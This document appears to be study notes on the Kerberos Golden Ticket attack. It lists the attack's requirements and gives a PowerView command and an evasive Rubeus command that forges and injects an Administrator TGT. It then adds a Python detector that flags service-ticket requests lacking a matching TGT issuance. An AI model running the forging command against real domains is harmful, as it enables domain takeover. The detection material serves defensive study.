Golden Ticket
A forged Ticket Granting Ticket (TGT) encrypted and signed with the krbtgt account's key. Because the KDC trusts anything signed with that key, the ticket lets an attacker impersonate any user (usually the Administrator) and claim any group membership; the forged TGT is created offline, so the domain controller never sees an AS-REQ for it.
Requirements:
- krbtgt NTLM hash or AES256 key.
- Domain SID (Security Identifier).
- Target username and Relative ID (RID) (typically 500 for Administrator).
# Retrieve the domain SID (PowerView cmdlet)
Get-DomainSID
# Forge the TGT with Rubeus and inject it into the current logon session (/ptt); replace the bracketed placeholders
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:[HASH_KRBTGT] /sid:[DOMAIN_SID] /user:Administrator /id:500 /ptt
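From the defender's side, the property above (a forged TGT is never issued by the KDC) is what a log review can key on: a service-ticket request (event 4769) for an account and client that no domain controller logged a TGT issuance (event 4768) for, or for an account that does not exist in the directory. The script below is an added example, not part of these notes; the events, the account list and the trimmed field names are constructed, and it assumes the 4768/4769 events from all DCs have been merged into one list.

```python
from datetime import datetime, timedelta

# Constructed sample of Security-log events merged from all domain controllers (fields trimmed).
# 4768 = TGT issued (AS-REQ), 4769 = service ticket requested (TGS-REQ).
EVENTS = [
    {"id": 4768, "time": "2024-05-01T08:00:00", "account": "alice", "client": "10.0.0.5"},
    {"id": 4769, "time": "2024-05-01T08:00:05", "account": "alice", "client": "10.0.0.5", "service": "cifs/fs01"},
    # No DC ever logged a 4768 for Administrator from this client, yet a TGT is being presented:
    # this is what a forged (golden) TGT looks like from the KDC's point of view.
    {"id": 4769, "time": "2024-05-01T09:15:00", "account": "Administrator", "client": "10.0.0.77", "service": "cifs/dc01"},
    # A ticket for an account that does not exist in the directory at all.
    {"id": 4769, "time": "2024-05-01T09:16:00", "account": "svc_ghost", "client": "10.0.0.77", "service": "ldap/dc01"},
]

# Constructed directory snapshot (sAMAccountName, lower-cased).
KNOWN_ACCOUNTS = {"alice", "bob", "administrator", "krbtgt"}

# Default domain policy "Maximum lifetime for user ticket" is 10 hours; a 4769 further than
# this from the last 4768 would need a 4770 (renewal), which this sample does not model.
TGT_LIFETIME = timedelta(hours=10)


def find_suspect_tgs(events, known_accounts=KNOWN_ACCOUNTS, tgt_lifetime=TGT_LIFETIME):
    """Return (time, account, client, reasons) for each 4769 that lacks a plausible TGT issuance."""
    tgt_times = {}  # (account, client) -> timestamps of 4768 events
    for e in events:
        if e["id"] == 4768:
            key = (e["account"].lower(), e["client"])
            tgt_times.setdefault(key, []).append(datetime.fromisoformat(e["time"]))
    findings = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        if e["id"] != 4769:
            continue
        t = datetime.fromisoformat(e["time"])
        acct = e["account"].lower()
        reasons = []
        issued = tgt_times.get((acct, e["client"]), [])
        if not any(t - tgt_lifetime <= it <= t for it in issued):
            reasons.append("no 4768 for this account/client within TGT lifetime")
        if acct not in known_accounts:
            reasons.append("account does not exist in the directory")
        if reasons:
            findings.append((e["time"], e["account"], e["client"], reasons))
    return findings


if __name__ == "__main__":
    for finding in find_suspect_tgs(EVENTS):
        print(finding)
```

In production the 4768 side must come from every DC (and include 4770 renewals), otherwise users whose TGT was issued by another DC are flagged as well.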